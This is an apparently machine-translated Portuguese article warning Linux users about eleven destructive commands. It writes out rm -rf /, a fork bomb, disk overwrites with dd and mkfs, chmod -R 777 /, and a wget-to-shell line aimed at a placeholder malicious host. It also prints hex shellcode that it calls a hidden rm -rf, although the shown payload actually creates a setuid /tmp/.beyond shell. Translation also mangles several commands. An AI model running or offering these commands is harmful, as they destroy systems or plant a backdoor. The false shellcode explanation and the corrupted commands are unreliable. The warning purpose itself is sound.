Pesquisa de site

Comandos mais perigosos – você nunca deve executar no Linux


A interface de linha de comando é um utilitário poderoso e prático para administrar um sistema Linux. Ele fornece uma maneira rápida e versátil de executar o sistema, especialmente ao gerenciar sistemas headless que não possuem interface gráfica.

Embora útil no gerenciamento do seu sistema, a linha de comando está repleta de riscos. A execução de comandos incorretos pode causar danos e danos irrecuperáveis ao seu sistema. Neste guia, compilamos uma lista de alguns dos comandos mais arriscados que você não deveria pensar em executar em seu sistema.

1.rm -rf/Comando

O comando rm é um comando do Linux usado para excluir arquivos e diretórios dependendo dos argumentos usados. No entanto, deve-se tomar extremo cuidado ao usar o comando rm, pois um pequeno erro de digitação ou erro pode resultar em danos irrecuperáveis ao sistema.

Quando executado como root com a opção -rf /, o comando exclui recursivamente todos os arquivos e diretórios do seu sistema começando pela raiz (/) que é a mais alta no Linux Estrutura de hierarquia de arquivos. Resumindo, o comando rm -rf / apaga completamente o seu sistema, resultando em um sistema quebrado e irrecuperável.

Algumas das opções usadas com o comando rm são.

  • O comando rm no Linux é usado para excluir arquivos.
  • O comando rm -r exclui a pasta recursivamente, até mesmo a pasta vazia.
  • O comando rm -f remove ‘Arquivo somente leitura’ sem perguntar.
  • rm -rf / : Força a exclusão de tudo no diretório raiz.
  • rm -rf * : Força a exclusão de tudo no diretório/diretório de trabalho atual.
  • rm -rf . : Força a exclusão da pasta e subpastas atuais.

Na verdade, ao executar o comando como um usuário normal, você receberá dois avisos no terminal.

Para superar a exclusão acidental de arquivos pelo comando 'rm', crie um alias do comando 'rm' como 'rm -i' em o arquivo “.bashrc ”, ele solicitará que você confirme cada exclusão.

2. :(){:|:&};: Comando

O texto acima é na verdade uma bomba garfo. Ele opera criando uma função chamada ':', que se chama duas vezes, uma em primeiro plano e outra em segundo plano. A função é executada repetidamente e, ao fazer isso, consome todos os recursos do sistema, resultando em uma falha do sistema.

Na verdade, um comando fork bomb é essencialmente uma forma de ataque DoS (Denial-of-Service). Também é conhecido como vírus Wabbit ou Coelho. A pior parte é que você não precisa ser root para lançar este ataque.

Felizmente, você pode se proteger desse ataque limitando o número de processos executados por usuários locais a cerca de 4.000.

Você pode fazer isso executando o comando:

ulimit -S -u 4000

Você pode verificar isso posteriormente usando o comando:

ulimit -u

3. comando> /dev/sda

Executar um comando seguido de >/dev/sda substitui o bloco /dev/sda em seu disco rígido. Este bloco contém dados do sistema de arquivos e, quando substituído, resulta em um sistema danificado que é irrecuperável.

4. pasta mv /dev/null

Outra operação prejudicial que você não deve tentar é mover um diretório ou arquivo para /dev/null. O arquivo /dev/null é um tipo especial de arquivo conhecido como dispositivo nulo ou “o buraco negro“. Qualquer coisa movida para /dev/null é descartada e destruída.

O comando a seguir move todo o conteúdo do diretório inicial do usuário para /dev/null, descartando consequentemente todos os dados contidos no diretório inicial do usuário

mv /home/user/* /dev/null

5. wget http://malicious_source -O- | eh

O comando wget é um comando que baixa arquivos de um servidor web ou de arquivos. O comando acima baixa um script de uma fonte maliciosa e o executa.

6. mkfs.ext3 /dev/sda

O comando mkfs cria um novo sistema de arquivos (ext2, ext3, ext4, etc) em um dispositivo de armazenamento formatado, na maioria dos casos uma partição de uma unidade de disco rígido. Executar o comando mkfs em uma partição apaga todos os dados armazenados nela.

Embora seja útil na formatação de partições de disco, a formatação de uma unidade inteira (como mkfs.ext3 /dev/sda) trava o sistema e o deixa em um estado irrecuperável. Isso acontece porque destrói todos os arquivos do sistema junto com seus dados pessoais.

O comando também pode assumir outras formas, conforme mostrado abaixo.

mkfs.ext4 /dev/sda
mkfs.xfs /dev/sda
mkfs.btrfs /dev/sda

7. > comando de arquivo

O arquivo > apaga o conteúdo de um arquivo e o deixa em branco. É sinônimo do comando cat /dev/null > file. Portanto, deve-se ter cuidado ao usar os operadores de redirecionamento em um sistema Linux.

Abaixo está uma demonstração de como este comando substitui um arquivo de texto. Você pode imaginar o desastre que este comando causaria quando o arquivo envolvido fosse um arquivo de configuração.

8. ^foo^barra

O comando ^foo^bar é tão perigoso quanto útil dependendo de como é executado. Embora permita editar comandos executados anteriormente e executá-los novamente, pode ser desastroso se você não estiver interessado nas alterações feitas nos comandos antes de executá-los.

9. dd if=/dev/random of=/dev/sda

O comando acima apaga o bloco /dev/sda e grava dados indesejados aleatórios no bloco. Seu sistema ficaria em um estágio inconsistente e irrecuperável.

10. Chmod-R 777 /

Embora possa não travar imediatamente o seu sistema Linux, o comando chmod -R 777 / atribui recursivamente todas as permissões (leitura, gravação e execução) a todos os arquivos no seu sistema Linux, começando pela raiz.

Isso expõe efetivamente todos os arquivos de configuração críticos e outros arquivos a todos os usuários e representa um enorme risco de segurança para o seu sistema. Qualquer pessoa com intenções nefastas pode mexer em arquivos cruciais e quebrar facilmente o seu sistema.

11. O Comando Oculto

O comando abaixo nada mais é do que o primeiro comando acima de (rm -rf). Aqui os códigos estão ocultos em hexadecimal para que um usuário ignorante possa ser enganado. Executar o código abaixo em seu terminal limpará sua partição raiz.

Este comando aqui mostra que a ameaça pode estar oculta e às vezes não ser detectável normalmente. Você deve estar ciente do que está fazendo e qual seria o resultado. Não compile/execute códigos de uma fonte desconhecida.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Nota: Não execute nenhum dos comandos acima em seu terminal ou shell Linux ou no computador de seu amigo ou escola. Se quiser testá-los, execute-os em uma máquina virtual.

Qualquer inconsistência ou perda de dados devido à execução do comando acima irá quebrar o seu sistema, pelo que nem o Autor do artigo nem a Tecmint são responsáveis.

É tudo por agora. Em breve estarei aqui novamente com outro artigo interessante que vocês vão adorar ler. Até lá, fique atento e conectado ao Tecmint.

Se você conhece algum outro comando perigoso do Linux e gostaria que o adicionássemos à lista, informe-nos por meio da seção de comentários e não se esqueça de fornecer seus valiosos comentários.